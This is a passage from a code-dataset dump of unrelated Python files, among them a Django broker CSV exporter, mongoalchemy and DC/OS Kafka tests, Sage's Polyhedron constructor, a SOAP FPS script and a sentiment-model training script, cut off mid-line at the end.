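# The client and lender exporters above repeat the same sorted-id ->
    # 'Yes'/'No' membership loop for qualifiers, needs, and property types.
    # A possible refactor, sketched here with an illustrative helper name
    # that is not used elsewhere in this app:
    def membership_columns(id_to_name, member_ids):
        # one 'Yes'/'No' per id, in the same sorted order the headers use
        members = set(member_ids)
        return ['Yes' if i in members else 'No' for i in sorted(id_to_name)]
    # e.g. fields.extend(membership_columns(qualifiers, client_qualifiers))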
header = [\n smart_str(u\"Broker First Name\"),\n smart_str(u\"Broker Last Name\"),\n smart_str(u\"Broker Company\"),\n smart_str(u\"Broker Street Address\"),\n smart_str(u\"Broker City\"),\n smart_str(u\"Broker State\"),\n smart_str(u\"Broker Zip Code\"),\n smart_str(u\"Broker Primary Email\"),\n smart_str(u\"Broker Secondary Email\"),\n smart_str(u\"Broker Work Phone\"),\n smart_str(u\"Broker Mobile Phone\"),\n smart_str(u\"Broker Fax Phone\"),\n smart_str(u\"Broker Other Phone\"),\n ]\n\n writer.writerow(\n header\n )\n\n# https://stackoverflow.com/questions/37652520/django-select-related-in-reverse/37792783\n for broker in queryset:\n fields = [\n smart_str(broker.user.first_name),\n smart_str(broker.user.last_name),\n smart_str(broker.company),\n smart_str(broker.user.address),\n smart_str(broker.user.city),\n smart_str(broker.user.state),\n smart_str(broker.user.zip_code),\n smart_str(broker.user.email),\n smart_str(broker.user.email_x),\n smart_str(broker.user.phone_w),\n smart_str(broker.user.phone_m),\n smart_str(broker.user.phone_f),\n smart_str(broker.user.phone_o),\n ]\n\n writer.writerow(fields)\n # end for\n\n return response\n# end def export_broker_csv\n\nexport_broker_csv.short_description = u\"Broker CSV Export\"\n\n# get_name\n# https://stackoverflow.com/questions/163823/can-list-display-in-a-django-modeladmin-display-attributes-of-foreignkey-field\nclass BrokerAdmin(admin.ModelAdmin):\n model = Broker\n list_display = ['get_first_name', 'get_last_name']\n actions = [export_broker_csv]\n\n def get_first_name(self, obj):\n return obj.user.first_name\n\n get_first_name.short_description = 'First Name'\n get_first_name.admin_order_field = 'user__first_name'\n\n def get_last_name(self, obj):\n return obj.user.last_name\n\n get_last_name.short_description = 'Last Name'\n get_last_name.admin_order_field = 'user__last_name'\n\n\nadmin.site.register(Broker, BrokerAdmin)\n","sub_path":"broker/loans/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":23517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"100175572","text":"from nose.tools import *\nfrom mongoalchemy.fields import *\n\nfrom mongoalchemy.exceptions import DocumentException, MissingValueException, ExtraValueException, FieldNotRetrieved, BadFieldSpecification\nfrom mongoalchemy.document import Document, DocumentField, document_type_registry\nfrom mongoalchemy.session import Session\nfrom test.util import known_failure\nfrom datetime import datetime\nfrom bson.dbref import DBRef\n\ndef get_session():\n s = Session.connect('unit-testing')\n s.clear_collection(A)\n s.clear_collection(C)\n return s\n\ndef test_setup():\n document_type_registry.clear()\n\n\nclass A(Document):\n x = IntField()\nclass AA(Document):\n x = IntField()\nclass B(Document):\n y = RefField(DocumentField(A))\nclass C(Document):\n y = RefField(DocumentField(A), autoload=True)\n\n# Field Tests\n\ndef test_reffield():\n\n\n a = A(x=5)\n s = get_session()\n s.insert(a)\n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbref = DBRef(collection='A', id=a.mongo_id)\n\n b = B(y=a)\n assert b.wrap()['y'] == dbref\n\ndef test_wrap_unwrap():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbref = DBRef(database='unit-testing', collection='A', id=a.mongo_id)\n dbref_without_db = DBRef(collection='A', id=a.mongo_id)\n\n f = RefField(DocumentField(A))\n assert f.wrap(a) == f.wrap(f.unwrap(f.wrap(a))), (f.wrap(a), f.wrap(f.unwrap(f.wrap(a))))\n\n\ndef 
test_wrap():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbref = DBRef(database='unit-testing', collection='A', id=a.mongo_id)\n dbref_without_db = DBRef(collection='A', id=a.mongo_id)\n\n f = RefField(DocumentField(A), simple=True)\n assert f.wrap(a) == a.mongo_id\n\n f = RefField(simple=True, collection='A')\n assert f.wrap(a.wrap()) == a.mongo_id\n\n f = RefField(collection='A')\n assert f.wrap(a.wrap()) == dbref_without_db, (f.wrap(a.wrap()), dbref)\n\n f = RefField(collection='A', db='unit-testing')\n assert f.wrap(a.wrap()) == dbref, (f.wrap(a.wrap()), dbref)\n\ndef test_unwrap():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbaref = DBRef(db='unit-testing', collection='A', id=a.mongo_id)\n\n ret = RefField(DocumentField(A)).unwrap(dbaref)\n assert isinstance(ret, DBRef), ret\n\n ret = RefField(DocumentField(A), simple=True).unwrap(a.mongo_id)\n assert isinstance(ret, DBRef), ret\n\n field = RefField(DocumentField(A), db='unit-testing', simple=True, autoload=True)\n ret = field.unwrap(a.mongo_id, session=s)\n assert isinstance(ret, A), ret\n\n field = RefField(collection='A', db='unit-testing', autoload=True)\n ret = field.unwrap(dbaref, session=s)\n assert ret['_id'] == a.mongo_id\n\n@raises(BadValueException)\ndef test_unwrap_bad_type():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbaref = DBRef(db='unit-testing', collection='A', id=a.mongo_id)\n\n ret = RefField(DocumentField(A)).unwrap(5)\n\n@raises(BadValueException)\ndef test_unwrap_bad_type_extra():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbaref = DBRef(db='unit-testing', collection='A', id=a.mongo_id)\n\n ret = RefField(DocumentField(A)).validate_unwrap(5)\n\n\n\ndef test_document_with_ref():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n c = C(y=a)\n s.insert(c)\n for c in s.query(C).all():\n assert c.y.x == 5\n\n@raises(BadValueException)\ndef test_document_with_error():\n s = get_session()\n aa = AA(x=4)\n s.insert(aa)\n c = C(y=aa)\n s.insert(c)\n\n@raises(BadValueException)\ndef test_unsaved_ref():\n s = get_session()\n a = A(x=4)\n c = C(y=a)\n s.insert(c)\n\n\n\n\n@raises(BadFieldSpecification)\ndef wrong_type_test():\n class D(Document):\n y = RefField(A)\n\n@raises(BadFieldSpecification)\ndef collection_and_type_test():\n class D(Document):\n y = RefField(DocumentField(A), collection='A')\n","sub_path":"test/test_ref_field.py","file_name":"test_ref_field.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"248480147","text":"\r\nwith open('A-small.in') as f:\r\n\twith open('A-small.out','w') as of:\r\n\t\tt = int(f.readline())\r\n\t\tfor case in range(1,t+1):\r\n\t\t\tn = int(f.readline())\r\n\t\t\tnums = list(map(int,f.readline().split()))\r\n\t\t\ttotalneg = 0\r\n\t\t\tbiggestgap = 0\r\n\t\t\tm2count = 0\r\n\t\t\tfor i in range(n-1):\r\n\t\t\t\tif nums[i] > nums[i + 1]:\r\n\t\t\t\t\tgap = nums[i] - nums[i + 1] \r\n\t\t\t\t\ttotalneg += gap\r\n\t\t\t\t\tif gap > biggestgap:\r\n\t\t\t\t\t\tbiggestgap = gap\r\n\t\t\tcurr = nums[0]\r\n\t\t\tfor i in range(1,n):\r\n\t\t\t\tif curr - biggestgap < 0:\r\n\t\t\t\t\tm2count += curr\r\n\t\t\t\telse:\r\n\t\t\t\t\tm2count += biggestgap\r\n\t\t\t\tcurr = nums[i]\r\n\r\n\t\t\tof.write(\"Case #{}: {} 
{}\\n\".format(case,totalneg,m2count))","sub_path":"solutions_6404600001200128_0/Python/mmailhot/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"373380244","text":"import unittest\n\nfrom solutions.problem_1_sum_multiples_of_3_and_5.solution_1 import solution_1\nfrom solutions.problem_1_sum_multiples_of_3_and_5.solution_2 import solution_2\nfrom solutions.problem_1_sum_multiples_of_3_and_5.solution_3 import solution_3\nimport timeit, functools\n\n_solutions = [solution_1, solution_2, solution_3]\n\n\nclass MyTestCase(unittest.TestCase):\n def test_benchmark(self):\n _inputs = [100, 200, 400, 800, 1600]\n _times = []\n print(\"Running benchmark...\")\n for _solution in _solutions:\n for input in _inputs:\n _time_execution_function(_solution, input, _times)\n print(\"%s benchmark\" % _solution.__name__)\n _print_benchmark_numbers(_inputs, _times)\n\n\ndef _time_execution_function(solution_func, input, times):\n _time_for_execution_in_seconds = timeit.Timer(functools.partial(solution_func, input)).timeit()\n times.append(_time_for_execution_in_seconds)\n\n\ndef _print_benchmark_numbers(inputs, times):\n for i in range(0, len(inputs)):\n print(\"input: %d, time(s): %d\" % (inputs[i], times[i]))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"solutions/problem_1_sum_multiples_of_3_and_5/tests_benchmark.py","file_name":"tests_benchmark.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"528386293","text":"import dcos.http\nimport inspect\nimport os\nimport pytest\nimport shakedown\n\nfrom tests.test_utils import (\n DEFAULT_TASK_COUNT,\n PACKAGE_NAME,\n check_health,\n get_marathon_config,\n get_deployment_plan,\n marathon_api_url,\n request,\n uninstall,\n spin\n)\n\n\nstrict_mode = os.getenv('SECURITY', 'permissive')\n\n\ndef setup_module(module):\n uninstall()\n\n if strict_mode == 'strict':\n shakedown.install_package_and_wait(\n package_name=PACKAGE_NAME,\n options_file=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"/strict.json\")\n else:\n shakedown.install_package_and_wait(\n package_name=PACKAGE_NAME,\n options_file=None)\n\n check_health()\n\n\ndef teardown_module(module):\n uninstall()\n\n\n@pytest.mark.sanity\ndef test_install_worked():\n pass\n\n\n@pytest.mark.sanity\ndef test_bump_metadata_cpus():\n check_health()\n meta_data_ids = get_task_ids('meta-data')\n print('meta-data ids: ' + str(meta_data_ids))\n\n data_ids = get_task_ids('data')\n print('data ids: ' + str(data_ids))\n\n config = get_marathon_config()\n cpus = float(config['env']['METADATA_CPU'])\n config['env']['METADATA_CPU'] = str(cpus + 0.1)\n r = request(\n dcos.http.put,\n marathon_api_url('apps/' + PACKAGE_NAME),\n json=config)\n\n tasks_updated('meta-data', meta_data_ids)\n tasks_not_updated('data', data_ids)\n\n check_health()\n\n\n@pytest.mark.sanity\ndef test_bump_data_nodes():\n check_health()\n\n meta_data_ids = get_task_ids('meta-data')\n print('meta-data ids: ' + str(meta_data_ids))\n\n data_ids = get_task_ids('data')\n print('data ids: ' + str(data_ids))\n\n config = get_marathon_config()\n dataNodeCount = int(config['env']['DATA_COUNT']) + 1\n config['env']['DATA_COUNT'] = str(dataNodeCount)\n r = request(\n dcos.http.put,\n marathon_api_url('apps/' + PACKAGE_NAME),\n json=config)\n\n check_health(DEFAULT_TASK_COUNT + 1)\n 
tasks_not_updated('meta-data', meta_data_ids)\n tasks_not_updated('data', data_ids)\n\n\ndef get_task_ids(prefix):\n tasks = shakedown.get_service_tasks(PACKAGE_NAME)\n prefixed_tasks = [t for t in tasks if t['name'].startswith(prefix)]\n task_ids = [t['id'] for t in prefixed_tasks]\n return task_ids\n\n\ndef tasks_updated(prefix, old_task_ids):\n def fn():\n try:\n return get_task_ids(prefix)\n except dcos.errors.DCOSHTTPException:\n return []\n\n def success_predicate(task_ids):\n print('Old task ids: ' + str(old_task_ids))\n print('New task ids: ' + str(task_ids))\n success = True\n\n for id in task_ids:\n print('Checking ' + id)\n if id in old_task_ids:\n success = False\n\n if not len(task_ids) >= len(old_task_ids):\n success = False\n\n print('Waiting for update to ' + prefix)\n return (\n success,\n 'Task type:' + prefix + ' not updated'\n )\n\n return spin(fn, success_predicate)\n\n\ndef tasks_not_updated(prefix, old_task_ids):\n def fn():\n try:\n return get_task_ids(prefix)\n except dcos.errors.DCOSHTTPException:\n return []\n\n def success_predicate(task_ids):\n print('Old task ids: ' + str(old_task_ids))\n print('New task ids: ' + str(task_ids))\n success = True\n\n for id in old_task_ids:\n print('Checking ' + id)\n if id not in task_ids:\n success = False\n\n if not len(task_ids) >= len(old_task_ids):\n success = False\n\n print('Determining no update occurred for ' + prefix)\n return (\n success,\n 'Task type:' + prefix + ' not updated'\n )\n\n return spin(fn, success_predicate)\n\n","sub_path":"frameworks/kafka/integration/tests/test_sanity.py","file_name":"test_sanity.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"79057300","text":"r\"\"\"\nPolyhedra\n\nIn this module, a polyhedron is a convex (possibly unbounded) set in\nEuclidean space cut out by a finite set of linear inequalities and\nlinear equations. Note that the dimension of the polyhedron can be\nless than the dimension of the ambient space. There are two\ncomplementary representations of the same data:\n\n**H(alf-space/Hyperplane)-representation**\n This describes a polyhedron as the common solution set of a\n finite number of\n\n * linear inequalities `A \\vec{x} + b \\geq 0`, and\n * linear equations `C \\vec{x} + d \\geq 0`.\n\n\n**V(ertex)-representation**\n The other representation is as the convex hull of vertices (and\n rays and lines to all for unbounded polyhedra) as generators. The\n polyhedron is then the Minkowski sum\n\n .. 
MATH::\n \n P = \\text{conv}\\{v_1,\\dots,v_k\\} +\n \\sum_{i=1}^m \\RR_+ r_i +\n \\sum_{j=1}^n \\RR \\ell_j\n\n where\n \n * `v_1`, `\\dots`, `v_k` are a finite number of vertices,\n * `r_1`, `\\dots`, `r_m` are generators of rays,\n * and `\\ell_1`, `\\dots`, `\\ell_n` are generators of full lines.\n\n\nA polytope is defined as a bounded polyhedron.\n\nEXAMPLES::\n\n sage: trunc_quadr = Polyhedron(vertices=[[1,0],[0,1]], rays=[[1,0],[0,1]])\n sage: trunc_quadr\n A 2-dimensional polyhedron in QQ^2 defined as the convex hull of 2 vertices and 2 rays\n sage: v = trunc_quadr.vertex_generator().next() # the first vertex in the internal enumeration\n sage: v\n A vertex at (0, 1)\n sage: v.vector()\n (0, 1)\n sage: list(v)\n [0, 1]\n sage: len(v)\n 2\n sage: v[0] + v[1]\n 1\n sage: v.is_vertex()\n True\n sage: type(v)\n \n sage: type( v() )\n \n sage: v.polyhedron()\n A 2-dimensional polyhedron in QQ^2 defined as the convex hull of 2 vertices and 2 rays\n sage: r = trunc_quadr.ray_generator().next()\n sage: r\n A ray in the direction (0, 1)\n sage: r.vector()\n (0, 1)\n sage: [x for x in v.neighbors()]\n [A ray in the direction (0, 1), A ray in the direction (1, 0), A vertex at (1, 0)]\n\nInequalities `A \\vec{x} + b \\geq 0` (and, similarly, equations) are\nspecified by a list ``[b, A]``::\n\n sage: Polyhedron(ieqs = [[0,1,0],[0,0,1],[1,-1,-1]]).Hrepresentation()\n (An inequality (-1, -1) x + 1 >= 0,\n An inequality (1, 0) x + 0 >= 0,\n An inequality (0, 1) x + 0 >= 0)\n\nSee :func:`Polyhedron` for a detailed description of all possible ways\nto construct a polyhedron.\n\nREFERENCES:\n\n Komei Fukuda's `FAQ in Polyhedral Computation\n `_\n\nAUTHORS:\n\n - Marshall Hampton: first version, bug fixes, and various improvements, 2008 and 2009\n - Arnaud Bergeron: improvements to triangulation and rendering, 2008\n - Sebastien Barthelemy: documentation improvements, 2008\n - Volker Braun: refactoring, handle non-compact case, 2009 and 2010\n - Andrey Novoseltsev: added Hasse_diagram_from_incidences, 2010\n - Volker Braun: rewrite to use PPL instead of cddlib, 2011\n\"\"\"\n\n########################################################################\n# Copyright (C) 2008 Marshall Hampton \n# Copyright (C) 2011 Volker Braun \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n#\n# http://www.gnu.org/licenses/\n########################################################################\n\nfrom sage.rings.all import QQ, ZZ, RDF\nfrom sage.misc.decorators import rename_keyword\n\nfrom misc import (\n _set_to_None_if_empty, _set_to_empty_if_None,\n _common_length_of )\n\n\n\n \n\n\n#########################################################################\n@rename_keyword(deprecated='Sage version 4.7.2', field='base_ring')\ndef Polyhedron(vertices=None, rays=None, lines=None,\n ieqs=None, eqns=None,\n base_ring=QQ, minimize=True, verbose=False,\n backend=None):\n \"\"\"\n Construct a polyhedron object.\n\n You may either define it with vertex/ray/line or\n inequalities/equations data, but not both. Redundant data will\n automatically be removed (unless ``minimize=False``), and the\n complementary representation will be computed.\n\n INPUT:\n\n - ``vertices`` -- list of point. Each point can be specified as\n any iterable container of ``base_ring`` elements.\n \n - ``rays`` -- list of rays. Each ray can be specified as any\n iterable container of ``base_ring`` elements.\n \n - ``lines`` -- list of lines. 
Each line can be specified as any\n iterable container of ``base_ring`` elements.\n\n - ``ieqs`` -- list of inequalities. Each line can be specified as\n any iterable container of ``base_ring`` elements.\n\n - ``eqns`` -- list of equalities. Each line can be specified as\n any iterable container of ``base_ring`` elements.\n\n - ``base_ring`` -- either ``QQ`` or ``RDF``. The field over which\n the polyhedron will be defined. For ``QQ``, exact arithmetic\n will be used. For ``RDF``, floating point numbers will be\n used. Floating point arithmetic is faster but might give the\n wrong result for degenerate input.\n\n - ``backend`` -- string or ``None`` (default). The backend to use. Valid choices are\n\n * ``'cddr'``: cdd (:mod:`~sage.geometry.polyhedron.backend_cdd`)\n with rational coefficients\n\n * ``'cddf'``: cdd with floating-point coefficients\n\n * ``'ppl'``: use ppl\n (:mod:`~sage.geometry.polyhedron.backend_ppl`) with `\\QQ`\n coefficients.\n\n Some backends support further optional arguments:\n\n - ``minimize`` -- boolean (default: ``True``). Whether to\n immediately remove redundant H/V-representation data. Currently\n not used.\n\n - ``verbose`` -- boolean (default: ``False``). Whether to print\n verbose output for debugging purposes. Only supported by the cdd\n backends.\n\n OUTPUT:\n\n The polyhedron defined by the input data.\n\n EXAMPLES:\n\n Construct some polyhedra::\n\n sage: square_from_vertices = Polyhedron(vertices = [[1, 1], [1, -1], [-1, 1], [-1, -1]])\n sage: square_from_ieqs = Polyhedron(ieqs = [[1, 0, 1], [1, 1, 0], [1, 0, -1], [1, -1, 0]])\n sage: list(square_from_ieqs.vertex_generator())\n [A vertex at (1, -1),\n A vertex at (1, 1),\n A vertex at (-1, 1),\n A vertex at (-1, -1)]\n sage: list(square_from_vertices.inequality_generator())\n [An inequality (1, 0) x + 1 >= 0,\n An inequality (0, 1) x + 1 >= 0,\n An inequality (-1, 0) x + 1 >= 0,\n An inequality (0, -1) x + 1 >= 0]\n sage: p = Polyhedron(vertices = [[1.1, 2.2], [3.3, 4.4]], base_ring=RDF)\n sage: p.n_inequalities()\n 2\n\n The same polyhedron given in two ways::\n\n sage: p = Polyhedron(ieqs = [[0,1,0,0],[0,0,1,0]])\n sage: p.Vrepresentation()\n (A line in the direction (0, 0, 1),\n A ray in the direction (1, 0, 0),\n A ray in the direction (0, 1, 0),\n A vertex at (0, 0, 0))\n sage: q = Polyhedron(vertices=[[0,0,0]], rays=[[1,0,0],[0,1,0]], lines=[[0,0,1]])\n sage: q.Hrepresentation()\n (An inequality (1, 0, 0) x + 0 >= 0,\n An inequality (0, 1, 0) x + 0 >= 0)\n\n Finally, a more complicated example. Take `\\mathbb{R}_{\\geq 0}^6` with\n coordinates `a, b, \\dots, f` and\n\n * The inequality `e+b \\geq c+d`\n * The inequality `e+c \\geq b+d`\n * The equation `a+b+c+d+e+f = 31`\n \n ::\n\n sage: positive_coords = Polyhedron(ieqs=[\n ... [0, 1, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0],\n ... [0, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 1, 0], [0, 0, 0, 0, 0, 0, 1]])\n sage: P = Polyhedron(ieqs=positive_coords.inequalities() + [\n ... [0,0,1,-1,-1,1,0], [0,0,-1,1,-1,1,0]], eqns=[[-31,1,1,1,1,1,1]])\n sage: P\n A 5-dimensional polyhedron in QQ^6 defined as the convex hull of 7 vertices\n sage: P.dim()\n 5\n sage: P.Vrepresentation()\n (A vertex at (31, 0, 0, 0, 0, 0), A vertex at (0, 0, 0, 0, 0, 31),\n A vertex at (0, 0, 0, 0, 31, 0), A vertex at (0, 0, 31/2, 0, 31/2, 0),\n A vertex at (0, 31/2, 31/2, 0, 0, 0), A vertex at (0, 31/2, 0, 0, 31/2, 0),\n A vertex at (0, 0, 0, 31/2, 31/2, 0))\n\n .. 
NOTE::\n \n * Once constructed, a ``Polyhedron`` object is immutable.\n * Although the option ``field=RDF`` allows numerical data to\n be used, it might not give the right answer for degenerate\n input data - the results can depend upon the tolerance\n setting of cdd.\n \"\"\"\n # Clean up the arguments\n vertices = _set_to_None_if_empty(vertices)\n rays = _set_to_None_if_empty(rays)\n lines = _set_to_None_if_empty(lines)\n ieqs = _set_to_None_if_empty(ieqs)\n eqns = _set_to_None_if_empty(eqns)\n\n got_Vrep = (vertices is not None or rays is not None or lines is not None)\n got_Hrep = (ieqs is not None or eqns is not None)\n \n if got_Vrep and got_Hrep:\n raise ValueError('You cannot specify both H- and V-representation.')\n elif got_Vrep:\n vertices = _set_to_empty_if_None(vertices)\n rays = _set_to_empty_if_None(rays)\n lines = _set_to_empty_if_None(lines)\n Vrep = [vertices, rays, lines]\n Hrep = None\n ambient_dim = _common_length_of(*Vrep)[1]\n elif got_Hrep:\n ieqs = _set_to_empty_if_None(ieqs)\n eqns = _set_to_empty_if_None(eqns)\n Vrep = None\n Hrep = [ieqs, eqns]\n ambient_dim = _common_length_of(*Hrep)[1] - 1\n else:\n Vrep = None\n Hrep = None\n ambient_dim = 0\n\n if backend is not None:\n if backend=='ppl':\n from backend_ppl import Polyhedron_QQ_ppl\n return Polyhedron_QQ_ppl(ambient_dim, Vrep, Hrep, minimize=minimize)\n if backend=='cddr':\n from backend_cdd import Polyhedron_QQ_cdd\n return Polyhedron_QQ_cdd(ambient_dim, Vrep, Hrep, verbose=verbose)\n if backend=='cddf':\n from backend_cdd import Polyhedron_RDF_cdd\n return Polyhedron_RDF_cdd(ambient_dim, Vrep, Hrep, verbose=verbose)\n\n if base_ring is QQ:\n from backend_ppl import Polyhedron_QQ_ppl\n return Polyhedron_QQ_ppl(ambient_dim, Vrep, Hrep, minimize=minimize)\n elif base_ring is RDF:\n from backend_cdd import Polyhedron_RDF_cdd\n return Polyhedron_RDF_cdd(ambient_dim, Vrep, Hrep, verbose=verbose)\n else:\n raise ValueError('Polyhedron objects can only be constructed over QQ and RDF')\n\n\n\n\n\n","sub_path":"sage/geometry/polyhedron/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":10751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"616641200","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport argparse\nimport random\nimport quippy as qp\nimport numpy as np\nimport SOAPTools\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-soap', type=str, default='SOAPFiles.dat', \n help='File containing SOAP vectors')\nparser.add_argument('-fps', type=int, default=0, \n help='Number of SOAP components to select via FPS')\nparser.add_argument('-qfps', type=float, default=0, \n help='Cutoff for Quick FPS')\nparser.add_argument('-nr', type=int, default=0, \n help='Number of random indices to select')\nparser.add_argument('-c', action='store_true', \n help='Select on components')\nparser.add_argument('-output', type=str, default='.',\n help='Directory where outputs should be saved')\n\nargs = parser.parse_args()\n\n# Read input file containing list of files that contain SOAP vectors\nf = open(args.soap, 'r')\ninputFiles = f.readlines()\ninputFiles = [i.strip() for i in inputFiles]\n\n# Can only do batch processing on environments, not components\nif len(inputFiles) > 1 and args.c:\n sys.exit('Cannot select components reliably with batched data')\n\n# Concatenate the SOAP vectors from the separate files\nsubFPS = []\nfileIDs = []\nnewIdxs = []\n\nn = 0\nnEnv = 0\n\n# Loop over the batches\n# and do FPS for each batch\nfor 
idx, i in enumerate(inputFiles):\n sys.stdout.write('Reading SOAPs in batch %d...\\n' % (idx+1))\n if os.path.splitext(i)[1] == '.npy':\n SOAP = np.load(i)\n else:\n SOAP = np.loadtxt(i)\n\n # Transpose SOAP vectors if selecting on components\n # Use SOAP vectors as-is if selecting environments\n if args.c:\n SOAP = SOAP.T\n \n # Do \"quick FPS\"\n if args.qfps > 0:\n idxs = SOAPTools.quick_FPS(SOAP.T, D=args.fps, cutoff=args.qfps)\n newIdxs.append(idxs+nEnv)\n subFPS.append(SOAP[idxs])\n \n # Do FPS\n elif args.fps > 0:\n idxs = SOAPTools.do_FPS(SOAP, D=args.fps)\n newIdxs.append(idxs+nEnv)\n subFPS.append(SOAP[idxs])\n\n nEnv += len(SOAP)\n\n# Take our FPS points for each batch,\n# and do another FPS on the concatenated\n# subselection\nif len(subFPS) > 1:\n sys.stdout.write('Selecting FPS Points from subsample...\\n')\n newIdxs = np.concatenate(newIdxs)\n subFPS = np.concatenate(subFPS)\n\n # Do FPS on the concatenated FPS points\n if args.qfps > 0:\n idxs = SOAPTools.quick_FPS(subFPS.T, D=args.fps, cutoff=args.qfps)\n np.savetxt('%s/quickFPS.idxs' % args.output, newIdxs[idxs], fmt='%d')\n elif args.fps > 0:\n idxs = SOAPTools.do_FPS(subFPS, D=args.fps)\n np.savetxt('%s/FPS.idxs' % args.output, newIdxs[idxs], fmt='%d')\n\n# If we only have one batch,\n# we don't need to subselect, just save and exit\nelse:\n newIdxs = np.asarray(newIdxs).flatten()\n if args.qfps > 0:\n np.savetxt('%s/quickFPS.idxs' % args.output, newIdxs, fmt='%d')\n elif args.fps > 0:\n np.savetxt('%s/FPS.idxs' % args.output, newIdxs, fmt='%d')\n\n# Random selection\nif args.nr > 0:\n randomIdxs = range(0, nEnv)\n np.random.shuffle(randomIdxs)\n randomIdxs = randomIdxs[0:args.nr]\n randomIdxs.sort()\n np.savetxt('%s/random.idxs' % args.output, randomIdxs, fmt='%d')\n\n","sub_path":"Scripts/FPS.py","file_name":"FPS.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"154512006","text":"import sys\n#\n# >>> Escriba el codigo del reducer a partir de este punto <<<\n#\nif __name__ == '__main__':\n \n\tlines = sys.stdin.readlines()\n\n\tfor line in lines:\n\t\tif line[3] not in ['1', '4', 1, 4, None, ' ', '\\n', '\\t']:\n\t\t\t#print(line[0])\n\t\t\tsys.stdout.write(\"{},{}{}\\n\".format(line[0],line[2],line[3]))\n\t\telse:\n\t\t\t#print(\"nada\")\n\t\t\tsys.stdout.write(\"{},{}{}\".format(line[0],line[2],line[3]))\n","sub_path":"01-hadoop-50/q04-10/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"376320464","text":"from django.conf.urls import url\nfrom . 
import views\n\n\nurlpatterns = [\n\turl(r'^zhudi$',views.zhudi_table_list , name='zhudi_table_list'),\n url(r'zhudi/(?P\\d+)/$',views.zhudi_table_detail , name='zhudi_table_detail'),\n url(r'zhudi/create/$',views.zhudi_table_create , name='zhudi_table_create'),\n url(r'zhudi/(?P\\d+)/delete/$',views.zhudi_table_delete , name='zhudi_table_delete'),\n url(r'zhudi/create_session/$',views.zhudi_session_create , name='zhudi_session_create'),\n url(r'zhudi/delete_session/(?P\\d+)$',views.zhudi_session_delete , name='zhudi_session_delete'),\n\turl(r'^zuxun$',views.zuxun_table_list , name='zuxun_table_list'),\n\turl(r'zuxun/(?P\\d+)/$',views.zuxun_table_detail , name='zuxun_table_detail'),\n\turl(r'zuxun/create/$',views.zuxun_table_create , name='zuxun_table_create'),\n\turl(r'zuxun/(?P\\d+)/delete/$',views.zuxun_table_delete , name='zuxun_table_delete'),\n\turl(r'zuxun/create_session/$',views.zuxun_session_create , name='zuxun_session_create'),\n\turl(r'zuxun/delete_session/(?P\\d+)$',views.zuxun_session_delete , name='zuxun_session_delete'),\n\n]","sub_path":"train/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"371395057","text":"from utils import *\nfrom model import *\n\ntrain_path = './data/training_label.txt'\ntest_path = './data/testing_data.txt'\n\nntoken = 10000\nsave_path='./result/'\n###=========================================================\n### Load and preprocessing the data\n###=========================================================\n\nX_data, Y_data = load_train_data(train_path)\nprint(len(Y_data), Y_data[:10])\nprint(len(X_data), X_data[0])\nprint(len(X_data), X_data[1])\nshow_break()\n\ndictionary, rev_dictionary = build_dict(X_data)\nprint('dictionary length: ', len(dictionary))\n\nX_data_num = word2num(X_data, dictionary)\nprint(len(X_data_num), X_data_num[0])\nprint(len(X_data_num), X_data_num[1])\nshow_break()\n\nX_test_data = load_test_data(test_path)\nprint(len(X_test_data), X_test_data[0])\nprint(len(X_test_data), X_test_data[1])\nshow_break()\n\nX_test_num = word2num(X_test_data, dictionary)\nprint(len(X_test_num), X_test_num[0])\nprint(len(X_test_num), X_test_num[1])\nshow_break()\n###=========================================================\n### Build the model\n###=========================================================\nnet = Model(ntoken=ntoken)\nprint(net)\nshow_break()\n\ntry:\n\tnet = torch.load(save_path+'net.pkl')\n\tprint('Reload Net successfully~')\nexcept:\n\tprint('Start new training...')\nshow_break()\n\noptimizer = torch.optim.Adam(net.parameters(), lr=1e-4)\nloss_func = torch.nn.CrossEntropyLoss()\n\nloss_count = 0.0\nfor i in range(2000):\n\tb_x, b_y = get_minibatch(X_data_num, Y_data, batch_size=32, max_l=20)\n\tb_x = torch.from_numpy(b_x).type(torch.int64)\n\tb_y = 